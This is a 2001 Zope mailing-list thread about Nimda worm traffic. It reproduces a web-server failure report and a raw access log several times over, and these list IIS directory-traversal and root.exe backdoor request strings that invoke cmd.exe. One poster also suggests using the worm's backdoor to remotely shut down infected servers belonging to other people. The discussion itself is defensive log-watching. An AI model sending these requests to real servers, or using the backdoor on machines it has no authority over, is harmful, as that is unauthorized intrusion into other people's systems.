Failure Report (9/19/2001 - 24 hour report) Listing the top 30 files by the number of failed requests, sorted by the number of failed requests. reqs: file ----: ---- 1210: /scripts/..%255c../winnt/system32/cmd.exe 1210: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 1204: /scripts/..%5c../winnt/system32/cmd.exe 1204: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 615: /scripts/root.exe 615: /scripts/root.exe?/c+dir 611: /MSADC/root.exe 611: /MSADC/root.exe?/c+dir 610: /c/winnt/system32/cmd.exe 610: /c/winnt/system32/cmd.exe?/c+dir 609: /d/winnt/system32/cmd.exe 609: /d/winnt/system32/cmd.exe?/c+dir 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 604: /scripts/..%c1%1c../winnt/system32/cmd.exe 604: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 603: /scripts/..%c0%af../winnt/system32/cmd.exe 603: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 603: /scripts/winnt/system32/cmd.exe 603: /scripts/winnt/system32/cmd.exe?/c+dir 602: /scripts/..%c1%9c../winnt/system32/cmd.exe 602: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 598: /scripts/..%252f../winnt/system32/cmd.exe 598: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir That is a lot of requests! Glad Zope could handle it. BZ
On 20 Sep 2001 18:28:43 -0000, you wrote:
Failure Report (9/19/2001 - 24 hour report) Listing the top 30 files by the number of failed requests, sorted by the number of failed requests.
reqs: file ----: ---- 1210: /scripts/..%255c../winnt/system32/cmd.exe 1210: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 1204: /scripts/..%5c../winnt/system32/cmd.exe 1204: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 615: /scripts/root.exe 615: /scripts/root.exe?/c+dir 611: /MSADC/root.exe 611: /MSADC/root.exe?/c+dir 610: /c/winnt/system32/cmd.exe 610: /c/winnt/system32/cmd.exe?/c+dir 609: /d/winnt/system32/cmd.exe 609: /d/winnt/system32/cmd.exe?/c+dir 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 604: /scripts/..%c1%1c../winnt/system32/cmd.exe 604: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 603: /scripts/..%c0%af../winnt/system32/cmd.exe 603: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 603: /scripts/winnt/system32/cmd.exe 603: /scripts/winnt/system32/cmd.exe?/c+dir 602: /scripts/..%c1%9c../winnt/system32/cmd.exe 602: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 598: /scripts/..%252f../winnt/system32/cmd.exe 598: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
That is a lot of requests! Glad Zope could handle it.
You can "help" your infected neigbours by remotely turning their infected servers off! see http://pc.xs4all.nl/default.ida (it is a Perl script that uses the same backdoor as the virus itself. I've not yet installed perl in Zope, but am working on it ";-) -- __________________________________________________ "Nothing is as subjective as reality" Reinoud van Leeuwen reinoud@xs4all.nl http://www.xs4all.nl/~reinoud -> when replying to a mailinglist mail, please do <- -> *NOT* cc: me as well. If I read the list I will <- -> receive the reply as well! <- __________________________________________________
How do you get that log from Zope? On Thu, Sep 20, 2001 at 08:30:33PM +0000, Reinoud van Leeuwen wrote:
On 20 Sep 2001 18:28:43 -0000, you wrote:
Failure Report (9/19/2001 - 24 hour report) Listing the top 30 files by the number of failed requests, sorted by the number of failed requests.
reqs: file ----: ---- 1210: /scripts/..%255c../winnt/system32/cmd.exe 1210: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 1204: /scripts/..%5c../winnt/system32/cmd.exe 1204: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 615: /scripts/root.exe 615: /scripts/root.exe?/c+dir 611: /MSADC/root.exe 611: /MSADC/root.exe?/c+dir 610: /c/winnt/system32/cmd.exe 610: /c/winnt/system32/cmd.exe?/c+dir 609: /d/winnt/system32/cmd.exe 609: /d/winnt/system32/cmd.exe?/c+dir 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 604: /scripts/..%c1%1c../winnt/system32/cmd.exe 604: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 603: /scripts/..%c0%af../winnt/system32/cmd.exe 603: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 603: /scripts/winnt/system32/cmd.exe 603: /scripts/winnt/system32/cmd.exe?/c+dir 602: /scripts/..%c1%9c../winnt/system32/cmd.exe 602: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 598: /scripts/..%252f../winnt/system32/cmd.exe 598: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
That is a lot of requests! Glad Zope could handle it.
You can "help" your infected neigbours by remotely turning their infected servers off! see http://pc.xs4all.nl/default.ida
(it is a Perl script that uses the same backdoor as the virus itself. I've not yet installed perl in Zope, but am working on it ";-)
-- __________________________________________________ "Nothing is as subjective as reality" Reinoud van Leeuwen reinoud@xs4all.nl http://www.xs4all.nl/~reinoud -> when replying to a mailinglist mail, please do <- -> *NOT* cc: me as well. If I read the list I will <- -> receive the reply as well! <- __________________________________________________
_______________________________________________ Zope maillist - Zope@zope.org http://lists.zope.org/mailman/listinfo/zope ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope-dev )
-- Michael Montagne montagne@boora.com http://www.boora.com
From Z2.log and Analog (http://www.analog.cx) BZ At 2:08 PM -0700 9/20/01, Michael Montagne wrote:
How do you get that log from Zope?
On Thu, Sep 20, 2001 at 08:30:33PM +0000, Reinoud van Leeuwen wrote:
On 20 Sep 2001 18:28:43 -0000, you wrote:
Failure Report (9/19/2001 - 24 hour report) Listing the top 30 files by the number of failed requests, sorted by the number of failed requests.
reqs: file ----: ---- 1210: /scripts/..%255c../winnt/system32/cmd.exe 1210: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 1204: /scripts/..%5c../winnt/system32/cmd.exe 1204: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 615: /scripts/root.exe 615: /scripts/root.exe?/c+dir 611: /MSADC/root.exe 611: /MSADC/root.exe?/c+dir 610: /c/winnt/system32/cmd.exe 610: /c/winnt/system32/cmd.exe?/c+dir 609: /d/winnt/system32/cmd.exe 609: /d/winnt/system32/cmd.exe?/c+dir 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 604: /scripts/..%c1%1c../winnt/system32/cmd.exe 604: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 603: /scripts/..%c0%af../winnt/system32/cmd.exe 603: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 603: /scripts/winnt/system32/cmd.exe 603: /scripts/winnt/system32/cmd.exe?/c+dir 602: /scripts/..%c1%9c../winnt/system32/cmd.exe 602: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 598: /scripts/..%252f../winnt/system32/cmd.exe 598: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
That is a lot of requests! Glad Zope could handle it.
You can "help" your infected neigbours by remotely turning their infected servers off! see http://pc.xs4all.nl/default.ida
(it is a Perl script that uses the same backdoor as the virus itself. I've not yet installed perl in Zope, but am working on it ";-)
-- __________________________________________________ "Nothing is as subjective as reality" Reinoud van Leeuwen reinoud@xs4all.nl http://www.xs4all.nl/~reinoud -> when replying to a mailinglist mail, please do <- -> *NOT* cc: me as well. If I read the list I will <- -> receive the reply as well! <- __________________________________________________
_______________________________________________ Zope maillist - Zope@zope.org http://lists.zope.org/mailman/listinfo/zope ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope-dev )
-- Michael Montagne montagne@boora.com http://www.boora.com
_______________________________________________ Zope maillist - Zope@zope.org http://lists.zope.org/mailman/listinfo/zope ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope-dev )
Re: [Zope] Zope 1 : NIMDA 0does this involve zeo and apache? all of a sudden our apache server crashed i had mod_rewrite there. then when a new apache server with more capacity went back up, zeo clients slowed down. what happened? thanks. ----- Original Message ----- From: BZ To: Michael Montagne ; zope@zope.org Sent: Friday, September 21, 2001 7:18 AM Subject: Re: [Zope] Zope 1 : NIMDA 0 From Z2.log and Analog (http://www.analog.cx) BZ At 2:08 PM -0700 9/20/01, Michael Montagne wrote:
How do you get that log from Zope?
On Thu, Sep 20, 2001 at 08:30:33PM +0000, Reinoud van Leeuwen wrote:
On 20 Sep 2001 18:28:43 -0000, you wrote:
Failure Report (9/19/2001 - 24 hour report) Listing the top 30 files by the number of failed requests, sorted by the number of failed requests.
reqs: file ----: ---- 1210: /scripts/..%255c../winnt/system32/cmd.exe 1210: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 1204: /scripts/..%5c../winnt/system32/cmd.exe 1204: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 615: /scripts/root.exe 615: /scripts/root.exe?/c+dir 611: /MSADC/root.exe 611: /MSADC/root.exe?/c+dir 610: /c/winnt/system32/cmd.exe 610: /c/winnt/system32/cmd.exe?/c+dir 609: /d/winnt/system32/cmd.exe 609: /d/winnt/system32/cmd.exe?/c+dir 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 604: /scripts/..%c1%1c../winnt/system32/cmd.exe 604: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/ system32/cmd.exe 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/ system32/cmd.exe?/c+dir 603: /scripts/..%c0%af../winnt/system32/cmd.exe 603: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 603: /scripts/winnt/system32/cmd.exe 603: /scripts/winnt/system32/cmd.exe?/c+dir 602: /scripts/..%c1%9c../winnt/system32/cmd.exe 602: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 598: /scripts/..%252f../winnt/system32/cmd.exe 598: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
That is a lot of requests! Glad Zope could handle it.
You can "help" your infected neigbours by remotely turning their infected servers off! see http://pc.xs4all.nl/default.ida
(it is a Perl script that uses the same backdoor as the virus itself. I've not yet installed perl in Zope, but am working on it ";-)
-- __________________________________________________ "Nothing is as subjective as reality" Reinoud van Leeuwen reinoud@xs4all.nl http://www.xs4all.nl/~reinoud -> when replying to a mailinglist mail, please do <- -> *NOT* cc: me as well. If I read the list I will <- -> receive the reply as well! <- __________________________________________________
_______________________________________________ Zope maillist - Zope@zope.org http://lists.zope.org/mailman/listinfo/zope ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope-dev )
-- Michael Montagne montagne@boora.com http://www.boora.com
_______________________________________________ Zope maillist - Zope@zope.org http://lists.zope.org/mailman/listinfo/zope ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope-dev )
_______________________________________________ Zope maillist - Zope@zope.org http://lists.zope.org/mailman/listinfo/zope ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope-dev )
From: reinoud@xs4all.nl (Reinoud van Leeuwen)
You can "help" your infected neigbours by remotely turning their infected servers off! see http://pc.xs4all.nl/default.ida
(it is a Perl script that uses the same backdoor as the virus itself. I've not yet installed perl in Zope, but am working on it ";-)
I'm not seeing a request for that as part of the worm attack. It does a pattern of 16 requests, here's the log: 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:root.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:MSADC:root.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:c:winnt:system32:cmd.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:d:winnt:system32:cmd.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%5c..:winnt:system32:cmd.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:_vti_bin:..%5c..:..%5c..:..%5c..:winnt:system32:cmd.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:_mem_bin:..%5c..:..%5c..:..%5c..:winnt:system32:cmd.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:msadc:..%5c..:..%5c..:..%5c:..%c1%1c..:..%c1%1c..:..%c1%1c..:winnt:syst em32:cmd.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%c1%1c..:winnt:system32:cmd.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%c0%2f..:winnt:system32:cmd.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%c0%af..:winnt:system32:cmd.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%c1%9c..:winnt:system32:cmd.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%5c..:winnt:system32:cmd.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%5c..:winnt:system32:cmd.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%5c..:winnt:system32:cmd.exe File/folder not found 9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%2f..:winnt:system32:cmd.exe File/folder not found
participants (5)
-
BZ -
Fritz Mesedilla -
marc lindahl -
Michael Montagne -
reinoud@xs4all.nl